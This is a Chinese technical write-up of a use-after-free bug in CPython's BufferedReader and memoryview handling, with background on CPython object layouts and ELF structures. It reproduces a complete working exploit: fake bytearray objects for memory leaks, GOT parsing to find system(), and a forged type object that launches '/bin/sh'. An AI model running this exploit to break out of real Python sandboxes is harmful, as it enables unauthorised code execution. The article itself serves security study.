一个潜藏10年的Python UAF漏洞

一个潜藏10年的Python UAF漏洞
2022-6-6 23:18:31 Author: xz.aliyun.com(查看原文) 阅读量:42 收藏

原文：Exploiting a Use-After-Free for code execution in every version of Python 3

5月16日腾讯玄武实验室公众号推送了这篇文章，个人学习下来觉得要理解这个漏洞还需要一些知识基础，因此加了一些基础知识的说明，写了本篇保姆级漏洞说明。

先说一下漏洞危害，虽然该漏洞可以导致命令执行，但需要一个前提，那就是能执行Python代码，所以本漏洞几乎毫无意义，作者也说了，不如直接利用os.system，可能在一些受限的沙箱环境才需要利用该漏洞；但是通过其他方式去执行system('/bin/bash')是一件很有趣的事，所以有兴趣的来看下吧。

该漏洞针对的是CPython（C语言编写的Python.exe），需要了解Python对象在C语言中的表示形式，并了解一个特殊的对象memoryview，而作者编写Exp是针对Linux的Python3(64位)，所以还需要了解ELF文件结构。

导读

1~3：基础知识，会的可直接跳过。

4：原文的内容的解释，漏洞说明以及EXP解释。

5：另一个漏洞利用思路。

1.1 PyObject

Python中所有对象都是PyObject的子类，在C中没有类，因此都是结构体，结构体的头部都是PyObject，_PyObject_HEAD_EXTRA在release版本中是不存在的。

另外对于变长的对象，另外定义了一个结构体PyVarObject，多了一个字段ob_size，用于表示该对象包含类型的个数，但是每个类型所占长度则需要看ob_type指向的类对象了。

//3.10.4
//Include\object.h

/* PyObject_HEAD defines the initial segment of every PyObject. */
#define PyObject_HEAD                   PyObject ob_base;

#define PyObject_VAR_HEAD      PyVarObject ob_base;

#define PyObject_HEAD_INIT(type)        \
    { _PyObject_EXTRA_INIT              \
    1, type },

#define PyVarObject_HEAD_INIT(type, size)       \
    { PyObject_HEAD_INIT(type) size },

typedef struct _object {
    _PyObject_HEAD_EXTRA//该值release没有
    Py_ssize_t ob_refcnt;
    PyTypeObject *ob_type;
} PyObject;

typedef struct {
    PyObject ob_base;
    Py_ssize_t ob_size; /* Number of items in variable part */
} PyVarObject;

1.2 PyTypeObject

Python中类也是一个对象，在C语言中就是以PyTypeObject表示，所以每个Python对象通过type获取的都是一个PyTypeObject结构体数据。

tp_basicsize：表示的对象的基础数据的长度，可以理解位对象头信息长度。

tp_itemsize：表示每个item的长度，而item的个数则在PyVarObject的ob_size，因为只有PyVarObject是变长的。

PyTypeObject结构体中还包含了一些函数指针，比如获取和设置对象的属性，其实就是对应PyTypeObject结构体中的tp_getattr与tp_setattr指向的函数。

//3.10.4

//Include\object.h
typedef struct _typeobject PyTypeObject;


//Include\cpython\object.h
struct _typeobject {
    PyObject_VAR_HEAD
    const char *tp_name; /* For printing, in format "<module>.<name>" */
    Py_ssize_t tp_basicsize, tp_itemsize; /* For allocation */

    /* Methods to implement standard operations */

    destructor tp_dealloc;
    Py_ssize_t tp_vectorcall_offset;
    getattrfunc tp_getattr;
    setattrfunc tp_setattr;
    PyAsyncMethods *tp_as_async; /* formerly known as tp_compare (Python 2)
                                    or tp_reserved (Python 3) */
    reprfunc tp_repr;

    /* Method suites for standard classes */

    PyNumberMethods *tp_as_number;
    PySequenceMethods *tp_as_sequence;
    PyMappingMethods *tp_as_mapping;

    /* More standard operations (here for binary compatibility) */

    hashfunc tp_hash;
    ternaryfunc tp_call;
    reprfunc tp_str;
    getattrofunc tp_getattro;
    setattrofunc tp_setattro;

    /* Functions to access object as input/output buffer */
    PyBufferProcs *tp_as_buffer;

    /* Flags to define presence of optional/expanded features */
    unsigned long tp_flags;

    const char *tp_doc; /* Documentation string */

    /* Assigned meaning in release 2.0 */
    /* call function for all accessible objects */
    traverseproc tp_traverse;

    /* delete references to contained objects */
    inquiry tp_clear;

    /* Assigned meaning in release 2.1 */
    /* rich comparisons */
    richcmpfunc tp_richcompare;

    /* weak reference enabler */
    Py_ssize_t tp_weaklistoffset;

    /* Iterators */
    getiterfunc tp_iter;
    iternextfunc tp_iternext;

    /* Attribute descriptor and subclassing stuff */
    struct PyMethodDef *tp_methods;
    struct PyMemberDef *tp_members;
    struct PyGetSetDef *tp_getset;
    // Strong reference on a heap type, borrowed reference on a static type
    struct _typeobject *tp_base;
    PyObject *tp_dict;
    descrgetfunc tp_descr_get;
    descrsetfunc tp_descr_set;
    Py_ssize_t tp_dictoffset;
    initproc tp_init;
    allocfunc tp_alloc;
    newfunc tp_new;
    freefunc tp_free; /* Low-level free-memory routine */
    inquiry tp_is_gc; /* For PyObject_IS_GC */
    PyObject *tp_bases;
    PyObject *tp_mro; /* method resolution order */
    PyObject *tp_cache;
    PyObject *tp_subclasses;
    PyObject *tp_weaklist;
    destructor tp_del;

    /* Type attribute cache version tag. Added in version 2.6 */
    unsigned int tp_version_tag;

    destructor tp_finalize;
    vectorcallfunc tp_vectorcall;
};

1.3 bytearray

bytearray虽然是变长，但是数据通过字符串指针指向堆内存，实际数据存储在了ob_bytes中。

//3.10.4
//Include\cpython\bytearrayobject.h
typedef struct {
    PyObject_VAR_HEAD
    Py_ssize_t ob_alloc;   /* How many bytes allocated in ob_bytes */
    char *ob_bytes;        /* Physical backing buffer */
    char *ob_start;        /* Logical start inside ob_bytes */
    Py_ssize_t ob_exports; /* How many buffer exports */
} PyByteArrayObject;

1.4 bytes

bytes对象数据都是存储在PyBytesObject结构体中的，不像PyByteArrayObject结构体是通过指针指向的具体数据。

根据1.1可知PyVarObject中存在ob_size表示包含类型个数，这里就是包含的字节数了，数据均是存储在ob_sval中，并最后多一个字节，数据为\x00。

//3.10.4
//Include\cpython\bytesobject.h
typedef struct {
    PyObject_VAR_HEAD
    Py_hash_t ob_shash;
    char ob_sval[1];

    /* Invariants:
     *     ob_sval contains space for 'ob_size+1' elements.
     *     ob_sval[ob_size] == 0.
     *     ob_shash is the hash of the byte string or -1 if not computed yet.
     */
} PyBytesObject;

1.5 list

ob_item是指针的指针，也就可以理解为指针数组，每一项都是一个PyObject *。

//3.10.4
//Include\cpython\listobject.h
typedef struct {
    PyObject_VAR_HEAD
    /* Vector of pointers to list elements.  list[0] is ob_item[0], etc. */
    PyObject **ob_item;

    /* ob_item contains space for 'allocated' elements.  The number
     * currently in use is ob_size.
     * Invariants:
     *     0 <= ob_size <= allocated
     *     len(list) == ob_size
     *     ob_item == NULL implies ob_size == allocated == 0
     * list.sort() temporarily sets allocated to -1 to detect mutations.
     *
     * Items must normally not be NULL, except during construction when
     * the list is not yet visible outside the function that builds it.
     */
    Py_ssize_t allocated;
} PyListObject;

2.1 memoryview

Python的内建类memoryview

可以理解为指针，官方的说明，正常使用只能指向bytes或者bytearray对象的数据，是无法指向list对象的。

class memoryview(object)
#Create a memoryview that references object. object must support the buffer protocol. Built-in objects that support the buffer protocol include bytes and bytearray.

指向bytearray，就相当于PyByteArrayObject->ob_bytes；

指向bytes，就相当于PyBytesObject->ob_sval；

并且记录了具体长度，无法越界。

v=memoryview(b'abcd')
len(v) # 4
v[0] #61
v=memoryview(bytearray(b''))
len(v) # 4
v[0] #61

2.2 id

Python中的id函数返回的值其实是该对象在内存中的首地址。

官方文档：https://docs.python.org/3/library/functions.html#id

CPython implementation detail: This is the address of the object in memory.

这里推荐一本书《程序员的自我修养》，ELF文件解析主要的是参考该书以及elf.h文件。

因为Exp是针对的64位，所以介绍的结构体都是64位的。

3.1 文件头

结构体

//include\linux\elf.h
typedef struct elf64_hdr {
  unsigned char e_ident[16];        /* ELF "magic number" */
  Elf64_Half e_type;
  Elf64_Half e_machine;
  Elf64_Word e_version;
  Elf64_Addr e_entry;       /* Entry point virtual address */
  Elf64_Off e_phoff;        /* Program header table file offset */
  Elf64_Off e_shoff;        /* Section header table file offset */
  Elf64_Word e_flags;
  Elf64_Half e_ehsize;
  Elf64_Half e_phentsize;
  Elf64_Half e_phnum;
  Elf64_Half e_shentsize;
  Elf64_Half e_shnum;
  Elf64_Half e_shstrndx;
} Elf64_Ehdr;

e_ident中可以判断出是32位还是64位程序，数据存储是大端还是小端。

Elf64_Ehdr[0:4] = "\x7fELF"
Elf64_Ehdr[4]：1表示32位，2表示64位
Elf64_Ehdr[5]：1表示小端，2表示大端

e_type可以判断是否开启PIE。

Elf64_Ehdr[0x10:0x12]：2表示可执行文件，未开启PIE；3表示开启了PIE

获取Program Header Table的信息

Elf64_Ehdr[0x20:0x28]：e_phoff，获取到偏移
Elf64_Ehdr[0x36:0x38]：e_phentsize，Program Header每一项的大小
Elf64_Ehdr[0x38:0x3A]：e_phnum，Program Header中包含的总数

获取Section Header Table的信息

Elf64_Ehdr[0x28:0x30]：e_shoff，获取到偏移
Elf64_Ehdr[0x3A:0x3C]：e_shentsize，Section Header每一项的大小
Elf64_Ehdr[0x3C:0x3E]：e_shnum，Section Header中包含的总数

3.2 Program Header Table

主要是用于说明ELF文件如何映射到内存中的，可以通过命令readelf -l查看；Program Header Table中的每一项称为Segment，Segment是多个Section的合集，相同属性的Section放于一个Segment，结构体如下：

//include\linux\elf.h
typedef struct elf64_phdr {
  Elf64_Word p_type;
  Elf64_Word p_flags;
  Elf64_Off p_offset;       /* Segment file offset */
  Elf64_Addr p_vaddr;       /* Segment virtual address */
  Elf64_Addr p_paddr;       /* Segment physical address */
  Elf64_Xword p_filesz;     /* Segment size in file */
  Elf64_Xword p_memsz;      /* Segment size in memory */
  Elf64_Xword p_align;      /* Segment alignment, file & memory */
} Elf64_Phdr;

Elf64_Phdr[0:4]：p_type

占4字节，不同类型的值参考于010editor的Templates，会加载到内存的仅LOAD类型，PT_DYNAMIC会指出.dynamic在内存中的地址。

PT_NULL     =0,
PT_LOAD     =1,
PT_DYNAMIC  =2,
PT_INERP    =3,
PT_NOTE     =4,
PT_SHLIB    =5,
PT_PHDR     =6,
PT_LOOS     =0x60000000,
PT_HIOS     =0x6fffffff,
PT_LOPROC   =0x70000000,
PT_HIPROC   =0x7fffffff

Elf64_Phdr[0x10:0x18]：p_vaddr

占8字节，该Segment的virtual address，虚拟地址，即内存地址，若开启PIE，则是相对基址的偏移。

Elf64_Phdr[0x30:0x38]：p_align

占8字节，Segment的对齐属性，用于表示在内存中的对齐单位，一般是0x1000。

3.3 .dynamic

保存了动态链接器所需要的基本信息。

typedef struct {
  Elf64_Sxword d_tag;       /* entry tag value */
  union {
    Elf64_Xword d_val;
    Elf64_Addr d_ptr;
  } d_un;
} Elf64_Dyn;

d_tag：表明该项值的类型。

/* This is the info that is needed to parse the dynamic section of the file */
#define DT_NULL     0
#define DT_NEEDED   1
#define DT_PLTRELSZ 2
#define DT_PLTGOT   3
#define DT_HASH     4
#define DT_STRTAB   5
#define DT_SYMTAB   6
#define DT_RELA     7
#define DT_RELASZ   8
#define DT_RELAENT  9
#define DT_STRSZ    10
#define DT_SYMENT   11
#define DT_INIT     12
#define DT_FINI     13
#define DT_SONAME   14
#define DT_RPATH    15
#define DT_SYMBOLIC 16
#define DT_REL          17
#define DT_RELSZ    18
#define DT_RELENT   19
#define DT_PLTREL   20
#define DT_DEBUG    21
#define DT_TEXTREL  22
#define DT_JMPREL   23
#define DT_LOPROC   0x70000000
#define DT_HIPROC   0x7fffffff
#define DT_MIPS_RLD_VERSION 0x70000001
#define DT_MIPS_TIME_STAMP  0x70000002
#define DT_MIPS_ICHECKSUM   0x70000003
#define DT_MIPS_IVERSION    0x70000004
#define DT_MIPS_FLAGS       0x70000005
  #define RHF_NONE        0
  #define RHF_HARDWAY         1
  #define RHF_NOTPOT          2
#define DT_MIPS_BASE_ADDRESS    0x70000006
#define DT_MIPS_CONFLICT    0x70000008
#define DT_MIPS_LIBLIST     0x70000009
#define DT_MIPS_LOCAL_GOTNO 0x7000000a
#define DT_MIPS_CONFLICTNO  0x7000000b
#define DT_MIPS_LIBLISTNO   0x70000010
#define DT_MIPS_SYMTABNO    0x70000011
#define DT_MIPS_UNREFEXTNO  0x70000012
#define DT_MIPS_GOTSYM      0x70000013
#define DT_MIPS_HIPAGENO    0x70000014
#define DT_MIPS_RLD_MAP     0x70000016

//other
#define DT_INIT_ARRAY       0x19
#define DT_INIT_ARRAYSZ     0x1b
#define DT_FINI_ARRAY       0x1a
#define DT_FINI_ARRAYSZ     0x1c

部分类型的解释，参考《程序员的自我修养》

d_tag类型	d_un的含义
DT_NEEDED	依赖的共享对象文件，d_ptr表示所依赖共享对象文件名在引用的字符串表中的偏移，引用的字符串表在段表中的索引根据Section的sh_link来确定
DT_SYMTAB	动态链接符号表在内存中的地址，d_ptr表示.dynsym的地址
DT_STRTAB	动态链接字符串表在内存中的地址，d_ptr表示.dynstr的地址
DT_STRSZ	动态链接字符串表的大小，d_val表示大小
DT_HASH	动态链接hash表地址，d_ptr表示.hash的地址
DT_SONAME	本共享对象的"SO-NAME"，因此仅.so文件存在
DT_RPATH	动态链接共享对象搜索路径
DT_INIT	初始化代码地址，.init的地址
DT_FINI	结束代码的地址，.fini的地址
DT_REL	动态链接重定位表的地址，如.rel
DT_RELA	动态链接重定位表的地址，如.rela.dyn
DT_RELENT	动态重定位表入口数量
DT_RELAENT	动态重定位表入口数量
DT_INIT_ARRAY	.init_array的地址
DT_INIT_ARRAYSZ	.init_array的长度
DT_FINI_ARRAY	.fini_array的地址
DT_FINI_ARRAYSZ	.fini_array的长度
DT_PLTGOT	.got.plt的地址
DT_JMPREL	.rela.plt的地址，PLT相关的重定位表地址

3.4 重定位表

重定位表是有两种，在看段表时，是会看到.rel和.rela开头的重定位表，分别对应的结构体稍有不同。（PS:段表是Section Header Table，但由于不加载到内存中，所以就未作详细说明）

typedef struct elf64_rel {
  Elf64_Addr r_offset;  /* Location at which to apply the action */
  Elf64_Xword r_info;   /* index and type of relocation */
} Elf64_Rel;

typedef struct elf64_rela {
  Elf64_Addr r_offset;  /* Location at which to apply the action */
  Elf64_Xword r_info;   /* index and type of relocation */
  Elf64_Sxword r_addend;    /* Constant addend used to compute value */
} Elf64_Rela;

r_offset：占8字节，重定位的地址。

r_info：占8字节，最低位4字节用于表示类型，高4位字节用于表示对应的值。

Exp中关注的重定位表是.rela.plt(.dynamic中的DT_JMPREL所指)，该表中r_info_type的类型都是R_X86_64_JUMP_SLO，对应的值为7，而r_info_value表示的是重定位的符号在符号表中的索引，.rela.plt相关的符号表是.dynsym(.dynamic中的DT_SYMTAB所指)。

3.5 符号表

符号表每一项代表一个符号，符号表的第一项（索引为0）一般为无效项。结构体如下：

typedef struct elf64_sym {
  Elf64_Word st_name;       /* Symbol name, index in string tbl */
  unsigned char st_info;    /* Type and binding attributes */
  unsigned char st_other;   /* No defined meaning, 0 */
  Elf64_Half st_shndx;      /* Associated section index */
  Elf64_Addr st_value;      /* Value of the symbol */
  Elf64_Xword st_size;      /* Associated symbol size */
} Elf64_Sym;

Elf64_Sym[0:4]：st_name

占4字节，表示符号名称字符串在字符串表的偏移量，但具体是哪个字符串表则需要看自身所在段表的段描述项的sh_link（表示引用的字符串段表描述项在段表中的索引）。

Exp关注的符号表是.dynsym，它所关联的字符串表是.dynstr(.dynamic中的DT_STRTAB所指)。

4.1 起因

原文作者是关注到了一个issue：memoryview to freed memory can cause segfault。

看一下POC

import io

class File(io.RawIOBase):
    def readinto(self, buf):
        global view
        view = buf
    def readable(self):
        return True

f = io.BufferedReader(File())
f.read(1)                       # get view of buffer used by BufferedReader
del f                           # deallocate buffer
view = view.cast('P')
L = [None] * len(view)          # create list whose array has same size
                                # (this will probably coincide with view)
view[0] = 0                     # overwrite first item with NULL
print(L[0])                     # segfault: dereferencing NULL

4.1.1 获取memoryview

POC中的全局变量view的类型是memoryview，至于原因我勉强根据官方文档与源码注释找了一下，且就一看，这一段我并不保证完全正确。

执行f.read(1)，会调用到自定义类的readinto方法，并传入memoryview类型的buf参数。

首先根据官方文档https://docs.python.org/3/library/io.html#io.BufferedReader，知道BufferedReader继承于BufferedIOBase。

调用链：

BufferedIOBase的read方法：_io__Buffered_read_impl，内部会调用_bufferedreader_read_generic
_bufferedreader_read_generic内部会调用_bufferedreader_raw_read
_bufferedreader_raw_read内部会使用PyMemoryView_FromBuffer创建memoryview对象，然后通过PyObject_CallMethodOneArg(self->raw, _PyIO_str_readinto, memobj)去调用子类的readinto方法。

源代码版本3.10.4，仅保留了调用链部分代码，完整代码可根据第一行注释的路径去查看源码。

//Modules\_io\bufferedio.c

/*[clinic input]
_io._Buffered.read
    size as n: Py_ssize_t(accept={int, NoneType}) = -1
    /
[clinic start generated code]*/
static PyObject *
_io__Buffered_read_impl(buffered *self, Py_ssize_t n)
/*[clinic end generated code: output=f41c78bb15b9bbe9 input=7df81e82e08a68a2]*/
{
    ......
        res = _bufferedreader_read_generic(self, n);
    ......
}


/* Generic read function: read from the stream until enough bytes are read,
 * or until an EOF occurs or until read() would block.
 */
static PyObject *
_bufferedreader_read_generic(buffered *self, Py_ssize_t n)
{
   ......
        r = _bufferedreader_raw_read(self, out + written, r);
    ......
}



static Py_ssize_t
_bufferedreader_raw_read(buffered *self, char *start, Py_ssize_t len)
{
    ......
    memobj = PyMemoryView_FromBuffer(&buf);
    if (memobj == NULL)
        return -1;
    /* NOTE: PyErr_SetFromErrno() calls PyErr_CheckSignals() when EINTR
       occurs so we needn't do it ourselves.
       We then retry reading, ignoring the signal if no handler has
       raised (see issue #10956).
    */
    do {
        res = PyObject_CallMethodOneArg(self->raw, _PyIO_str_readinto, memobj);
    } while (res == NULL && _PyIO_trap_eintr());
    ......
}

4.1.2 释放对象

del f将会释放对象，那么view指向的对象就释放了；无法通过python代码创建一个memoryview对象去指向一个bytes类对象，后del指向的对象并不会释放内存，因为引用计数未清零。

4.1.3 重新申请同样大小的内存

view = view.cast('P')：将view内中的数据理解为指针，因为需要根据view的长度来申请新的内存，根据1.5 list的分析，ob_item指向的是指针数组，POC就是想让这段内存正好等于view指向的，所以先将view的数据类型转化为指针，再根据view的长度创建list对象，也就是L = [None] * len(view)。

此时view存储的就是PyObject*，都是指向的None对象，然后通过将第一个指针改为0，再获取导致报错。

当然也可以通过id来获取其他对象的地址，其实也是PyObject*，那么赋值给view[0]，即可修改list L的成员了，如：

view[0] = id('a')
print(L[0]) # a

4.2 漏洞利用

4.2.1 内存泄露

利用漏洞可以让memoryview对象view指向一个PyObject*[]，利用id函数指向不同的对象，再利用list对象L[n]来使用对象。

这里就想到了bytearray了，结构体中是存在指针的，只需要将ob_bytes和ob_start的位置处填入想要读取的内存地址，再使得view[0] = id(bytearray对象)，那么L[0]就可以作为ByteArray对象读取字节数据了,比如L[0][0:8]读取对应地址的前8字节。

typedef struct {
    PyObject_VAR_HEAD
    Py_ssize_t ob_alloc;   /* How many bytes allocated in ob_bytes */
    char *ob_bytes;        /* Physical backing buffer */
    char *ob_start;        /* Logical start inside ob_bytes */
    Py_ssize_t ob_exports; /* How many buffer exports */
} PyByteArrayObject;

现在的问题就是如何修改ob_bytes和ob_start了，作者给出的答案是伪造一个PyByteArrayObject，使用的bytes类，因为bytes的数据就是存储在PyBytesObject中，通过id获取PyBytesObject对象的首地址，再加上固定偏移量，即可指向ob_sval，ob_sval的值我们是可以控制的。

typedef struct {
    PyObject_VAR_HEAD
    Py_hash_t ob_shash;
    char ob_sval[1];
} PyBytesObject;

最终效果如下(作者的exp代码)

io = open.__self__
def uN(b):
    out = 0
    for i in range(len(b)):
        out |= (b[i] & 0xff) << i*8
    return out

def u64(x):
    assert len(x) == 8
    return uN(x)

def u32(x):
    assert len(x) == 4
    return uN(x)

def u16(x):
    assert len(x) == 2
    return uN(x)

def p64(x):
    s = bytearray()
    while x > 0:
        s.append(x & 0xff)
        x >>= 8
    return s.ljust(8, b'\0')

def flat(*args):
    return b''.join(args)

class File(io._RawIOBase):
    def readinto(self, buf):
        global view
        view = buf
    def readable(self):
        return True


class Exploit:
    def _create_fake_byte_array(self, addr, size):
        byte_array_obj = flat(
            p64(10),            # refcount
            p64(id(bytearray)), # type obj
            p64(size),          # ob_size
            p64(size),          # ob_alloc
            p64(addr),          # ob_bytes
            p64(addr),          # ob_start
            p64(0x0),           # ob_exports
        )
        self.no_gc.append(byte_array_obj)  # stop gc from freeing after return
        self.freed_buffer[0] = id(byte_array_obj) + 32

    def leak(self, addr, length):
        self._create_fake_byte_array(addr, length)
        return self.fake_objs[0][0:length]


    def __init__(self):
        # Trigger bug
        global view
        f = io.BufferedReader(File())
        f.read(1)
        del f
        view = view.cast('P')

        self.fake_objs = [None] * len(view)
        self.freed_buffer = view
        self.no_gc = []

在Exploit的init函数中获取了memoryview对象，存储为freed_buffer，fake_objs则是申请的list对象，其存储数据内存空间由freed_buffer指向。

4.2.2 寻找system函数地址

先说一下思路，主要是解析ELF文件，根据.dynamic中的信息去读取.got.plt['system']的值，读取内存的方法都是利用的4.2.1内存泄露。

根据PyTypeObject的找到函数的地址，该地址必定在.text段，处于一个Segment，且该Segment的地址必定高于ELF文件头的Segment；
根据页对齐原则（一般是0x1000对齐），向低地址遍历，找到ELF文件头魔数\x7fELF,因为加载的时候文件头必定是加载在页的首地址处的，并且此页的首地址是程序的基址；
解析ELF文件头，根据e_type的值判断是否开启PIE。
解析ELF文件头，获取PHT的首地址、PHT的个数、PHT每项的大小，进行遍历，找到p_type的值为PT_DYNAMIC(2)，获取到.dynamic的内存地址，，如果开启PIE，那么获取到的内存地址需要加上第2步获取到的程序基址；
遍历.dynamic段，获取到重定位表(DT_JMPREL：23)，符号表(DT_SYMTAB：6)，字符串表(DT_STRTAB：5)，这里获取到的地址已经是绝对地址了，即使开启了PIE，也已经重定位好了。
遍历重定位表，根据r_info的高4位获取在符号表中的索引，因为.dynamic中指向的重定位表的类型都是R_X86_64_JUMP_SLO；再根据符号表中的st_name去读取字符串表，找到名称为"system"，那么此时的重定位表的r_offset的值就是.got.plt['system']的地址。（PS：作者的exp中则是根据重定位表的偏移去读取的.got.plt表中的相应偏移，）

说明一下，第6步和作者的exp思路稍有不同，不同点如下：

作者的exp中则是根据重定位表的偏移去读取的.got.plt表中的相应偏移，我这认为重定位表的r_offset值就是了，作者不信任r_offset的原因我并不知道；
作者没有完全信任.got.plt['system']的值，如果存在PLT，则还去寻找了桩代码，但是ELF的延迟绑定，.got.plt['system']一开始存储的就是PLT桩代码，这一点作者不信任.got.plt['system']的原因我也并不知道；

但是我认为我的思路没有什么问题，因此精简了一下作者查找system函数地址的exp

PAGE_SIZE = 4096
SIZEOF_ELF64_SYM = 24

class Exploit:
    def find_bin_base(self):
        # Leak tp_dealloc pointer of PyLong_Type which points into the Python
        # binary.
        leak = self.leak(id(int), 32)
        cpython_binary_ptr = u64(leak[24:32])
        addr = (cpython_binary_ptr >> 12) << 12  # page align the address
        # Work backwards in pages until we find the start of the binary
        for i in range(10000):
            nxt = self.leak(addr, 4)
            if nxt == b'\x7fELF':
                return addr
            addr -= PAGE_SIZE
        return None

    def find_system(self):
        """
        Return either the address of the system PLT stub, or the address of 
        system itself if the binary is full RELRO.
        """
        bin_base = self.find_bin_base()
        data = self.leak(bin_base, 0x1000)

        # Parse ELF header
        type = u16(data[0x10:0x12])
        is_pie = type == 3
        phoff = u64(data[0x20:0x28])
        phentsize = u16(data[0x36:0x38])
        phnum = u16(data[0x38:0x3a])

        # Find .dynamic section
        dynamic = None
        for i in range(phnum):
            hdr_off = phoff + phentsize*i
            hdr = data[hdr_off:hdr_off + phentsize]
            p_type = u32(hdr[0x0:0x4])
            p_vaddr = u64(hdr[0x10:0x18])
            if p_type == 2:  # PT_DYNAMIC
                dynamic = p_vaddr

        if dynamic is None:
            print("[!!] Couldn't find PT_DYNAMIC section")
            return None

        if is_pie:
            dynamic += bin_base

        print('[*] .dynamic:   {}'.format(hex(dynamic)))
        dynamic_data = e.leak(dynamic, 500)

        # Parse the Elf64_Dyn entries, extracting what we need
        i = 0
        symtab = None
        strtab = None
        rela = None
        while True:
            d_tag = u64(dynamic_data[i*16:i*16 + 8])
            d_un = u64(dynamic_data[i*16 + 8:i*16 + 16])
            if d_tag == 0 and d_un == 0:
                break
            elif d_tag == 5:    # DT_STRTAB
                strtab = d_un
            elif d_tag == 6:    # DT_SYMTAB
                symtab = d_un
            elif d_tag == 23:   # DT_JMPREL
                rela = d_un
            i += 1

        if strtab is None or symtab is None or rela is None:
            print("[!!] Missing required info in .dynamic")
            return None


        print('[*] DT_SYMTAB:  {}'.format(hex(symtab)))
        print('[*] DT_STRTAB:  {}'.format(hex(strtab)))
        print('[*] DT_RELA:    {}'.format(hex(rela)))

        # Walk the relocation table, for each entry we read the relevant symtab
        # entry and then strtab entry to get the function name.
        rela_data = e.leak(rela, 0x1000)
        i = 0
        while True:
            off = i * 24
            r_info = u64(rela_data[off + 8:off + 16])
            symtab_idx = r_info >> 32  # ELF64_R_SYM
            symtab_entry = e.leak(symtab + symtab_idx * SIZEOF_ELF64_SYM, SIZEOF_ELF64_SYM)
            strtab_off = u32(symtab_entry[0:4])
            name = e.leak(strtab + strtab_off, 6)
            if name == b'system':
                print('[*] Found system at rela index {}'.format(i))
                system_got = u64(rela_data[off:off + 8])
                break
            i += 1

        func = u64(self.leak(system_got, 8))
        print('[*] system:     {}'.format(hex(func)))
        return func

e = Exploit()
system = e.find_system()

4.2.3 执行函数

当有了system函数的地址后，应该如何控制程序流程呢？答案依然是伪造，这里可以伪造任意类型的对象obj，并且伪造该对象的类型对象typeobj，obj->ob_type = &typeobj，根据1.2 PyTypeObject的描述，类对象中有函数指针，覆盖为system函数地址，比如tp_getattr，然后执行obj.aaa，就会去执行tp_getattr指向的函数了。

还有一个需要解决的是传参问题，Python在调用对象方法时，第一个参数是对象本身，是一个PyObject，作者利用这点，将obj->ob_refcnt的值设置为"/bin/sh"，这样第一个参数就相当于是char 传递给system了，在64位下，ob_refcnt的长度是8字节，而/bin/sh\x00的长度也正好为8，没有超过，否则就覆盖了obj->ob_type的值了。（PS:在调用对象方法时，会使得obj->ob_refcnt+1，所以第一个字节"/"需要减1，也就是\x2e了）

作者的exp如下

class Exploit:
    def set_rip(self, addr, obj_refcount=0x10):
        """Set rip by using a fake object and associated type object."""
        # Fake type object
        type_obj = flat(
            p64(0xac1dc0de),    # refcount
            b'X'*0x68,          # padding
            p64(addr)*100,      # vtable funcs 
        )
        self.no_gc.append(type_obj)

        # Fake PyObject
        data = flat(
            p64(obj_refcount),  # refcount
            p64(id(type_obj)),  # pointer to fake type object
        )
        self.no_gc.append(data)

        # The bytes data starts at offset 32 in the object 
        self.freed_buffer[0] = id(data) + 32

        try:
            # Now we trigger it. This calls tp_getattro on our fake type object
            self.fake_objs[0].trigger
        except:
            # Avoid messy error output when we exit our shell
            pass


e.set_rip(system, obj_refcount=u64(b'\x2ebin/sh\x00'))

4.3 彩蛋

UAF漏洞是需要io.RawIOBase，因此需要io模块，但作者没有使用import，而是用io=open.__self__替代。

open.self对应的io模块其实是_io，这个是Python内置的模块，而import io导入的io模块是PYTHON_HOME\lib\io.py，这个io其实就是对_io模块的封装，io.RawIOBase就是对_io._RawIOBase的封装了。

那么open.__self__为什么就是_io模块呢，这就是本篇彩蛋的内容了。

open是PyCFunctionObject结构体对象。

_io是PyModuleObject结构体对象。

4.3.1 self是什么

根据源码，可以知道self是PyCFunctionObject的m_self，但是这个值哪儿来呢，需要去看一下_io模块的初始化。

//3.10.4
//Include\cpython\methodobject.h
typedef struct {
    PyObject_HEAD
    PyMethodDef *m_ml; /* Description of the C function to call */
    PyObject    *m_self; /* Passed as 'self' arg to the C func, can be NULL */
    PyObject    *m_module; /* The __module__ attribute, can be anything */
    PyObject    *m_weakreflist; /* List of weak references */
    vectorcallfunc vectorcall;
} PyCFunctionObject;

#define PyCFunction_GET_SELF(func) \
        (((PyCFunctionObject *)func) -> m_ml -> ml_flags & METH_STATIC ? \
         NULL : ((PyCFunctionObject *)func) -> m_self)

//Objects\methodobject.c
static PyObject *
meth_get__self__(PyCFunctionObject *m, void *closure)
{
    PyObject *self;

    self = PyCFunction_GET_SELF(m);
    if (self == NULL)
        self = Py_None;
    Py_INCREF(self);
    return self;
}

static PyGetSetDef meth_getsets [] = {
    {"__doc__",  (getter)meth_get__doc__,  NULL, NULL},
    {"__name__", (getter)meth_get__name__, NULL, NULL},
    {"__qualname__", (getter)meth_get__qualname__, NULL, NULL},
    {"__self__", (getter)meth_get__self__, NULL, NULL},
    {"__text_signature__", (getter)meth_get__text_signature__, NULL, NULL},
    {0}
};

4.3.2 内置_io模块的初始化

看下PyModuleObject结构体的定义。

//3.10.4
//Include\internal\pycore_moduleobject.h
typedef struct {
    PyObject_HEAD
    PyObject *md_dict;
    struct PyModuleDef *md_def;
    void *md_state;
    PyObject *md_weaklist;
    // for logging purposes after md_dict is cleared
    PyObject *md_name;
} PyModuleObject;

PyModuleObject和PyCFunctionObject都有一个描述自身的结构体，分别是PyModuleDef、PyMethodDef。

//3.10.4
//Include\moduleobject.h
typedef struct PyModuleDef{
  PyModuleDef_Base m_base;
  const char* m_name;
  const char* m_doc;
  Py_ssize_t m_size;
  PyMethodDef *m_methods;
  struct PyModuleDef_Slot* m_slots;
  traverseproc m_traverse;
  inquiry m_clear;
  freefunc m_free;
} PyModuleDef;

//Include\methodobject.h
struct PyMethodDef {
    const char  *ml_name;   /* The name of the built-in function/method */
    PyCFunction ml_meth;    /* The C function that implements it */
    int         ml_flags;   /* Combination of METH_xxx flags, which mostly
                               describe the args expected by the C func */
    const char  *ml_doc;    /* The __doc__ attribute, or NULL */
};
typedef struct PyMethodDef PyMethodDef;

基本结构体说完了，来看_io模块的初始化函数，_PyIO_Module是_io的描述，里面包含了PyMethodDef module_methods，其中就有open方法的描述_IO_OPEN_METHODDEF。

//3.10.4
//Modules\_io\_iomodule.c
PyMODINIT_FUNC
PyInit__io(void)
{
    PyObject *m = PyModule_Create(&_PyIO_Module);
    ......
}

//Include\modsupport.h
#ifdef Py_LIMITED_API
#define PyModule_Create(module) \
        PyModule_Create2(module, PYTHON_ABI_VERSION)
#else
#define PyModule_Create(module) \
        PyModule_Create2(module, PYTHON_API_VERSION)
#endif
